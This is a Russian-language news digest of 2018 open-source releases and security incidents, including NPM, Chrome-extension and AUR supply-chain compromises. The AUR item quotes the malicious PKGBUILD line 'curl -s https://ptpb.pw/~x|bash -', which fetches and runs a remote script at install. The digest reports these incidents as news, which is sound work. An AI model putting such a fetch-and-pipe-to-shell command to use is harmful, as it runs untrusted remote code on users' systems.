Релиз http-сервера Apache 2.4.34

Опубликован релиз HTTP-сервера Apache 2.4.34, в котором представлено 38 изменений, не связанных с безопасностью. Основные улучшения: Разрешено использовать символ подчёркивания («_») в именах хостов; Расширены возможности модуля mod_md, разработанного проектом Let’s Encrypt для автоматизации получения и обслуживания сертификатов с использованием протокола ACME (Automatic Certificate Management Environment). Реализована возможность указания дополнительных параметров в директиве MDNotifyCmd, проверки ACME ограничены только доменами для которых явно активирован модуль, улучшена интеграция с libressl; В mod_proxy_http для worker-процессов добавлен новый параметр ‘responsefieldsize’, позволяющий увеличить максимальный размер заголовка в HTTP-ответе (по умолчанию 8192); В mod_ssl в директиве SSLOCSPEnable обеспечена поддержка режима ‘leaf’ для проверки только финальных элементов … Читать далее Релиз http-сервера Apache 2.4.34

Mozilla и Xiph развивают реализацию видеокодека AV1 на языке Rust

В рамках проекта rav1e разработчики из сообществ Xiph и Mozilla развивают экспериментальный кодировщик для формата кодирования видео AV1, написанный на языке Rust и отличающийся от эталонного кодировщика libaom более высокой скоростью кодирования и повышенным вниманием к обеспечению безопасности. AV1 заметно опережает x264 и libvpx-vp9 по уровню сжатия, но из-за усложнения алгоритмов предложенная реализация кодировщика требует существенно больше времени для кодирования (по скорости кодирования libaom отстаёт от libvpx-vp9 в сотни раз, а от x264 в тысячи раз). Новый вариант кодировщика на языке Rust в настоящее время обеспечивает производительность кодирования на уровне 5 кадров в секунду для видео с качеством 480p. Читать далее Mozilla и Xiph развивают реализацию видеокодека AV1 на языке Rust

Mozilla, Cloudflare, Fastly и Apple работают над применением шифрования для SNI

Компании Mozilla, Cloudflare, Fastly и Apple работают над новым TLS-расширением ESNI (Encrypted Server Name Indication), которое позволит передавать идентификатор запрошенного хоста в шифрованном виде. В настоящее время расширение SNI, необходимое для организации работы на одном IP-адресе наскольких HTTPS-сайтов со своими сертификатами, подразумевает передачу имени хоста на стадии согласования соединения в сообщении ClientHello, которое передаётся в открытом виде до установки шифрованного канала связи. С одной стороны подобная особенность упрощает организацию обработки запросов на http-серверах и позволяет использовать прокси и CDN-сети для проброса шифрованного трафика, но с другой стороны раскрывает информацию о запрошенных ресурсах для транзитных наблюдателей, например, позволяет провайдеру судить о … Читать далее Mozilla, Cloudflare, Fastly и Apple работают над применением шифрования для SNI

Оценка безопасности новой системы контейнерной изоляции Nabla

Джеймс Боттомли (James Bottomley), известный разработчик ядра Linux, входивший в координационный технический комитет Linux Foundation, опубликовал результаты анализа безопасности различных систем контейнерной изоляции, включая традиционные контейнеры Docker, недавно представленную систему Nabla, нацеленную на минимизацию выполняемых в основном ядре системных вызовов, и гибридные системы gVisor и Kata Containers с изоляцией на базе гипервизоров. Для каждого типа систем оценивался уровень защищённости от совершения горизонтальных атак (HAP, Horizontal Attack Profile), при которых брешь в одном из базовых слоёв (например, в ядре Linux или гипервизоре) может привести к полной компрометации всей инфраструктуры и получению контроля за корневым окружением и всеми запущенными контейнерами. Уровень безопасности … Читать далее Оценка безопасности новой системы контейнерной изоляции Nabla

Выпуск GNU Binutils 2.31

Представлен релиз набора системных утилит GNU Binutils 2.31, в состав которого входят такие программы, как GNU linker, GNU assembler, nm, objdump, strings, strip. В новой версии: Ускорено выполнение операций прямого связывания DLL для Cygwin и Mingw; В компоновщике в Linux по умолчанию включён режим «-z separate-code», повышающий защищённость исполняемых файлов ценой небольшого увеличения размера и потребления памяти; В дизассемблер добавлена поддержка файлов с прошивками в формате Netronome Flow Processor (NFP); В дизассемблере для архитектуры AArch64 обеспечен вывод предупреждений о некорректном применении процессорных инструкций; В менеджер архивов AR добавлена поддержка модификатора «O» для отображения смещений секций в архиве; В ассемблере для … Читать далее Выпуск GNU Binutils 2.31

Выпуск Latte Dock 0.8, альтернативной панели для KDE

Состоялся релиз панели Latte Dock 0.8, предлагающей элегантное и простое решение для управления задачами и плазмоидами. В том числе поддерживается эффект параболического увеличения пиктограмм в стиле macOS или панели Plank. Панель Latte построена на базе фреймворка KDE Plasma и требует для работы Plasma 5.12, KDE Frameworks 5.38 и Qt 5.9 или более новые выпуски. Код проекта распространяется под лицензией GPLv2. Установочные пакеты сформированы для Ubuntu, Debian, Fedora и openSUSE. Проект основан в результате слияния схожих по своим задачам панелей — Now Dock и Candil Dock. После объединения разработчики попытались совместить предлагаемый в Candil принцип формирования обособленной панели, работающей отдельно от … Читать далее Выпуск Latte Dock 0.8, альтернативной панели для KDE

Выпуск Debian 9.5

Доступно пятое корректирующее обновление дистрибутива Debian 9, в которое включены накопившиеся обновления пакетов и устранены недоработки в инсталляторе. Выпуск включает 91 обновление с устранением проблем со стабильностью и 100 обновлений с устранением уязвимостей. Из изменений в Debian 9.5 можно отметить удаление пакетов libnet-whois-perl, mlbviewer, python-uniconvertor, singularity-container и visionegg которые оказались без сопровождения или неработоспособны из-за прекращения работы связанных с ними сервисов. Обновлены до свежих стабильных версий пакеты clamav, dpdk, glx-alternatives, драйверы nvidia, rustc и postgresql-9.6. Для загрузки подготовлены установочные сборки, а также live iso-hybrid c Debian 9.5. Системы, установленные ранее и поддерживаемые в актуальном состоянии, получают обновления, присутствующие в Debian … Читать далее Выпуск Debian 9.5

Выпуск сервера приложений NGINX Unit 1.3

Доступен выпуск сервера приложений NGINX Unit 1.3, в рамках которого развивается решение для обеспечения запуска web-приложений на различных языках программирования (Python, PHP, Perl, Ruby и Go). Под управлением NGINX Unit может одновременно выполняться несколько приложений на разных языках программирования, параметры запуска которых можно изменять динамически без необходимости правки файлов конфигурации и перезапуска. Проект пока находится на стадии бета-тестирования и не рекомендован для промышленного использования. Код написан на языке Си и распространяется под лицензией Apache 2.0. С особенностями NGINX Unit можно познакомиться в анонсе прошлого выпуска. В новой версии: Добавлен параметр max_body_size для ограничения размера тела запроса; Добавлены новые параметры для … Читать далее Выпуск сервера приложений NGINX Unit 1.3

Организация Linux Foundation учредила коалицию LF Energy

Организация Linux Foundation объявила об образовании коалиции LF Energy, в рамках которой планируется развивать открытые проекты, связанные с энергетикой и охватывающие различные аспекты деятельности от создания адаптивных систем энергоснабжения до автоматизации процессов управления генерацией и передачей энергии. Инициативу поддержал RTE, крупнейший в Европе оператор электросетей, который передал под покровительство Linux Foundation и открыл исходные тексты трёх программных продуктов: OperatorFabric — модульная система для автоматизации работы операторов энергосетей, систем водоснабжения и других коммунальных коммуникаций; Let’s Coordinate — решение на базе OperatorFabric для координации работы систем энергоснабжения, организации взаимодействия служб и анализа информации о текущем состоянии инфраструктуры; PowSyBl Framework — набор компонентов … Читать далее Организация Linux Foundation учредила коалицию LF Energy

Релиз гипервизора Xen 4.11

После семи месяцев разработки состоялся релиз свободного гипервизора Xen 4.11. По сравнению с прошлым выпуском в Xen 4.11 внесено 1206 изменений. В разработке нового выпуска приняли участие такие компании, как Citrix, SUSE, ARM, AMD, Intel, Amazon, Google, Oracle, EPAM Systems, Huawei, DornerWorks и Qualcomm. Ключевые изменения в Xen 4.11: Продолжена работа по усовершенствованию ABI-интерфейса PVH, комбинирующего элементы режимов паравиртуализации (PV) для ввода/вывода, обработки прерываний, организации загрузки и взаимодействия с оборудованием, с применением полной виртуализации (HVM) для ограничения привилегированных инструкций, изоляции системных вызовов и виртуализации таблиц страниц памяти. Гостевые системы в режиме PVH содержат меньше критичного кода по сравнению с PV … Читать далее Релиз гипервизора Xen 4.11

В популярный NPM-модуль внедрено вредоносное ПО, копирующее параметры аутентификации

Администраторы репозитория NPM уведомили пользователей о компрометации пакетов eslint-scope и eslint-config-eslint, в которых поставлялся популярный анализатор JavaScript-кода, насчитывающий более 2 млн загрузок в неделю и 59 млн суммарных загрузок. В результате получения контроля за учётными данными мэйнтейнера eslint-scope злоумышленникам удалось опубликовать обновление, содержащее троянский код. При выполнении операции установки пакета, с сайта pastebin.com загружался и запускался скрипт, который отправлял на внешний сервер содержимое файла ~/.npmrc, включающего токен для аутентификации в NPM. Данные отправлялись на серверы учёта статистики посещений «sstatic1.histats.com» и «c.statcounter.com» в составе параметра, указанного в HTTP-заголовке «Referer» (злоумышленники могли просмотреть захваченные токены через web-интерфейсы счётчиков посещений histats.com и statcounter.com). … Читать далее В популярный NPM-модуль внедрено вредоносное ПО, копирующее параметры аутентификации

Гвидо ван Россум решил отстраниться от руководства проектом Python

Гвидо ван Россум (Guido van Rossum) сообщил о намерении покинуть пост великодушного пожизненного диктатора (BDFL) проекта Python и полностью отстраниться от участия в процессах принятия решений. Гвидо продолжит участие в проекте, но на позиции обычного core-разработчика и наставника. Он также не намерен назначать преемника на пост BDFL и поэтому предложил другим разработчикам обсудить возможность перехода на новую модель управления. До реструктуризации модели управления пост BDFL сохраняется, но формально Гвидо теперь находится в бессрочном отпуске. Читать далее Гвидо ван Россум решил отстраниться от руководства проектом Python

Релиз iptables 1.8.0

Спустя два с половиной года с момента формирования прошлой стабильной ветки 1.6.x представлен iptables 1.8.0, новый значительный релиз инструментария для управления пакетным фильтром Linux. Основные изменения: Обеспечено явное разделение классического фронтэнда iptables и нового фронтэнда, построенного поверх инфраструктуры пакетного фильтра nftables и позволяющего мигрировать на технологии nftables, продолжив использовать привычные инструменты и синтаксис iptables. Классический фронтэнд теперь поставляется с явным указанием в имени исполняемых файлов слова «-legacy», например iptables-legacy и iptables-legacy-save, а файлы фронтэнда на базе nftables вместо «-compat» теперь заканчиваются на «-nft», например, iptables-nft. При запуске iptables с командой ‘—version’ выдаётся информация о типе фронтэнда (например «iptables v1.8 (legacy)» … Читать далее Релиз iptables 1.8.0

Уязвимость в qutebrowser, позволяющая выполнить код в системе

В web-браузере qutebrowser, предоставляющем минимальный графический интерфейс и систему навигации в стиле Vim, выявлена уязвимость (CVE-2018-10895). Позволяющая выполнить CSRF-атаку со вставкой на страницы обращения к URL «qute://settings», что позволяет изменить настройки браузера при открытии подконтрольного атакующим сайта. В том числе атакующие могут изменить значение параметра editor.command и выполнить любой код в системе пользователя. Проблема устранена в выпуске 1.4.1. Читать далее Уязвимость в qutebrowser, позволяющая выполнить код в системе

Два новых варианта уязвимости Spectre. Усиление защиты Chrome

Раскрыты сведения о двух новых уязвимостях в механизме спекулятивного выполнения инструкций в процессорах. Уязвимости основываются на тех же принципах, что и метод атаки Spectre 1, поэтому им присвоены кодовые имена Spectre 1.1 (CVE-2018-3693) и Spectre 1.2 (CVE пока не назначен). Наличие проблем подтверждено в процессорах Intel и ARM, подверженность уязвимостям процессоров AMD пока находится под вопросом. В рамках программы по выплате вознаграждений за выявление уязвимостей компания Intel выплатила исследователям 100 тысяч долларов. Уязвимость Spectre 1.1 продолжает развитие идей по восстановлению данных, оставшихся в процессорном кэше в результате спекулятивного выполнения инструкций. Новый метод позволяет атакующему получить информацию о содержимом памяти через … Читать далее Два новых варианта уязвимости Spectre. Усиление защиты Chrome

Debian вошёл в консультативный cовет проекта KDE

Объявлено о включении представителей Debian в консультативный совет KDE (KDE Advisory Board), основной целью которого является информирование о потребностях различных компаний и организаций, использующих KDE в своих продуктах. Через Совет участники могут доводить до разработчиков свои пожелания и рекомендации, а также выражать точку зрения заинтересованных в продукте лиц и высказывать мнения о вводимых изменениях с позиции стороннего наблюдателя. Кроме Debian в консультативном совете представлены компании Canonical, SUSE и Blue Systems, а также такие организации как OSI (Open Source Initiative), Фонд СПО, Document Foundation (LibreOffice), Qt Company и Free Software Foundation Europe. Читать далее Debian вошёл в консультативный cовет проекта KDE

Дэниэл Бернштейн опубликовал новую библиотеку djbsort

Дэниэл Бернштейн (Daniel J. Bernstein), известный эксперт в области криптографии и создания защищённого ПО, разработавший такие проекты, как qmail, djbdns, NaCl, Ed25519, Curve25519 и ChaCha20-Poly1305, опубликовал новую библиотеку djbsort с реализацией высокопроизводительного алгоритма сортировки массивов целых чисел. Библиотека демонстрирует рекордные показатели в скорости сортировки в памяти, заметно опережая по производительности существующие аналоги. Например, djbsort при сортировке 1024 32-разрядных знаковых целых чисел расходует 2.5 цикла CPU на байт данных, независимо от содержимого массива, в то время как библиотека Intel IPP (Integrated Performance Primitives) с оптимизациями на базе инструкций AVX расходует около 32 циклов на байт. Кроме того, библиотека djbsort изначально написана … Читать далее Дэниэл Бернштейн опубликовал новую библиотеку djbsort

Зафиксирована подмена Chrome-дополнения Hola VPN, имеющего 8.7 млн пользователей

Компания Hola VPN сообщила о компрометации учётной записи одного из разработчиков проекта, в результате чего злоумышленники смогли подменить официальное дополнение Hola VPN к браузеру Chrome. Дополнение насчитывает около 8.7 млн пользователей. После получения параметров аутентификации разработчика в сервисах Google злоумышленники опубликовали модифицированную версию дополнения, в которой был встроен скрытый проброс на поддельную фишинг-страницу, срабатывающий при открытии сайта MyEtherWallet.com с реализацией web-кошелька для криптовалюты Ethereum. В настоящее время контроль над учётной записью возвращён и в каталоге Chrome Web Store размещено корректное дополнение. Информации о методе получения контроля за учётной записью разработчика Hola VPN пока не раскрывается. Всем пользователям MyEtherWallet, которые вчера … Читать далее Зафиксирована подмена Chrome-дополнения Hola VPN, имеющего 8.7 млн пользователей

В AUR-репозитории Arch Linux найдено вредоносное ПО

В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов. 7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен код «curl -s https://ptpb.pw/~x|bash -» вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта «https://ptpb.pw/~u», устанавливал его как /usr/lib/xeactor/u.sh и активировал … Читать далее В AUR-репозитории Arch Linux найдено вредоносное ПО

Выпуск дистрибутива Scientific Linux 6.10

Доступен релиз дистрибутива Scientific Linux 6.10, построенного на пакетной базе Red Hat Enterprise Linux 6.10 и дополненного средствами, ориентированными на использование в научных учреждениях. Дистрибутив поставляется для архитектур i386 и x86_64, для загрузки доступны установочный DVD (4.1 Гб) и сокращённый образ для установки по сети (231 Мб). Из отличий Scientific Linux 6.10 от версии 6.9, не связанных с заимствованием изменений из RHEL, отмечается обновление OpenAFS до версии 1.6.22.3. Общие отличия Scientific Linux 6.x от RHEL 6.x: Оконный менеджер IceWM; OpenAFS — открытая реализация распределенной ФС Andrew File System; Набор развиваемых в рамках проекта Fedora инструментов для создания Live-дисков и производных … Читать далее Выпуск дистрибутива Scientific Linux 6.10

В рамках проекта Browsh развивается консольный браузер на базе Firefox

Представлен новый консольный браузер Browsh, примечательный полноценной поддержкой web-технологий и возможностью отображения изображений, видео и WebGL-контента в форме ASCII-анимации. Для обработки контента применяется движок Firefox. Код Browsh написан на языках Go и JavaScript, и распространяется под лицензией GPLv3. Готовые сборки подготовлены для Linux, FreeBSD, macOS и Windows (для работы дополнительно должен быть установлен Firefox новее выпуска 56). В качестве основной области применения Browsh называется работа в условиях экономии трафика или при низкой пропускной способности. Например, при наличии канала связи порядка 3kbps (при подключении через телефон с GPRS) можно соединиться по SSH с сервером и запустить на нём Browsh. В отличие … Читать далее В рамках проекта Browsh развивается консольный браузер на базе Firefox